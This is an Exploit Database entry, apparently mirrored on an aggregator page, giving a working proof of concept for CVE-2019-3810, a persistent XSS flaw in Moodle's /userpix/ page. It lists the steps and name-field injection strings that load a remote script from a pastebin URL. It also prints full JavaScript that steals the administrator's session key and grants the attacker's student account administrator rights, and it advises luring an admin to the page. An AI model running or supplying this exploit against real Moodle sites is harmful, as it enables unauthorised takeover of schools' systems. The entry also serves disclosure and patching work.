Moodle 3.6.1 – Persistent Cross-Site Scripting (XSS)

• Exploit Database
• 15 阅读

• 作者： Fariskhi Vidyan
  日期： 2021-04-30
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/49814/

• # Exploit Title: Moodle 3.6.1 - Persistent Cross-Site Scripting (XSS)
  # Date: 04/2021
  # Exploit Author: farisv
  # Vendor Homepage: https://moodle.org/
  # Software Link: https://download.moodle.org https://github.com/moodle/moodle/archive/refs/tags/v3.6.1.zip
  # Version: Moodle < 3.6.2, < 3.5.4, < 3.4.7, < 3.1.16
  # CVE: CVE-2019-3810
  
  Moodle is a learning platform designed to provide educators, administrators,
  and learners with a single robust, secure and integrated system to create
  personalised learning environments.
  
  The following is PoC to use the XSS bug on /userpix/ (CVE-2019-3810) for
  privilege escalation from student to administrator.
  
  1. Upload the XSS payload [1] to pastebin or other similar service.
   Change the value of userid to your own id.
   Let's say the URL is https://pastebin.com/raw/xxxxxxxx.
  2. Login to your student account.
  3. Set first name with:
   " style="position:fixed;height:100%;width:100%;top:0;left:0" onmouseover="x=document.createElement
  4. Set surname with:
  ('script');x.src='https://pastebin.com/raw/xxxxxxxx';document.body.appendChild(x); alert('XSS')
  5. Ask the administrator to open /userpix/ page or put the link to that page
   on your post and wait.
  
  If successful, your account will be added as administrator.
  
  See the demonstration video on https://github.com/farisv/Moodle-CVE-2019-3810
  
  [1] XSS Payload for privilege escalation on Moodle. Change the value of userid to your id.
  
  var webroot = '/';
  var userid = '3';
  var sesskey = '';
  
  function get(path, success) {
  var xhr = new XMLHttpRequest();
  xhr.open('GET', webroot + path);
  xhr.onreadystatechange = function() {
  if (xhr.readyState > 3 && xhr.status == 200) {
  success(xhr.responseText);
  }
  };
  xhr.send();
  return xhr;
  }
  
  function post(path, data, success) {
  var xhr = new XMLHttpRequest();
  xhr.open('POST', webroot + path);
  xhr.onreadystatechange = function() {
  if (xhr.readyState > 3 && xhr.status == 200) {
  success(xhr.responseText);
  }
  };
  xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
  xhr.send(encodeURI(data));
  return xhr;
  }
  
  function setAdmin() {
  // Assign administrator access to userid
  bpath = 'admin/roles/admins.php';
  data = "confirmadd=" + userid + "&sesskey=" + sesskey;
  post(bpath, data, function(data){});
  }
  
  function getSesskey(data) {
  var sesskey_find = data.indexOf('"sesskey":"');
  sesskey = data.substr(sesskey_find + 11, 10);
  setAdmin();
  }
  
  function payload() {
  // We can find Sesskey inside JS script in main page
  get('', getSesskey);
  }
  
  // Start
  payload();